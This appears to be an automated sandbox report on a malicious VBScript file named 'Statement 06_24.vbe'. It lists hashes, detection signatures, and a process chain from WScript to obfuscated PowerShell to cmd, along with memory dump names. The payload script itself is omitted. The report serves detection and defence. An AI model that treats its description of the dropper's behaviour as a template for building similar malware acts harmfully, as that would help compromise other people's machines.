Analysis
max time kernel: 148s
max time network: 148s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64 arch:x86 image:win7-20231129-en locale:en-us os:windows7-x64 system
submitted: 24-06-2024 15:16
Static task: static1
Behavioral task: behavioral1
  Sample: Statement 06_24.vbe
  Resource: win7-20231129-en (windows7-x64)
  4 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: Statement 06_24.vbe
  Resource: win10v2004-20240611-en (windows10-2004-x64)
  12 signatures, 150 seconds
General
Target: Statement 06_24.vbe
Size: 23KB
MD5: 207b136f41dce4a20ef01071d8358131
SHA1: e5561b3304b7655ff20240631abf1eaa2aff37ef
SHA256: 63827bccbd36fabd8120635af4e68329bd834dc0e11c75d4bb81797421cb9d35
SHA512: 76b182aeed7902032265434c78b5757db5e7949e360267fb3a5648586eeb25bf12c22ea4520db4f0b114aeb0f9c5976989c53ec94c5c475a3bc103ccaa5c8eb6
SSDEEP: 384:nDJcEgWPwf0ulPLLgoylkWz1vAaFYruA/du48nAc55Xid6VKRm3PHAr:nFcEgWIfttLKWs1v9erzdu48Ac55XidH
Score: 8/10
Malware Config
Signatures
Blocklisted process makes network request (64 IoCs)
  Processes: powershell.exe (PID 2204), network flows 5 through 68
Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: powershell.exe (PID 2204)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe (PID 2204), Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: WScript.exe, powershell.exe
  PID 1712 (WScript.exe) wrote to memory of PID 2204 (powershell.exe), 3 times
  PID 2204 (powershell.exe) wrote to memory of PID 3052 (cmd.exe), 3 times
Processes
Level 1: C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Statement 06_24.vbe"
  - Suspicious use of WriteProcessMemory
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write '...';..." (long obfuscated PowerShell script, not reproduced here)
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
Level 3: C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nonrecurrent.Ico && echo t"
Network
MITRE ATT&CK Matrix
Downloads
memory/2204-4-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp  Filesize: 4KB
memory/2204-5-0x000000001B630000-0x000000001B912000-memory.dmp  Filesize: 2.9MB
memory/2204-6-0x0000000002340000-0x0000000002348000-memory.dmp  Filesize: 32KB
memory/2204-8-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-9-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-10-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-11-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-7-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-12-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB
memory/2204-13-0x000007FEF5DDE000-0x000007FEF5DDF000-memory.dmp  Filesize: 4KB
memory/2204-14-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp  Filesize: 9.6MB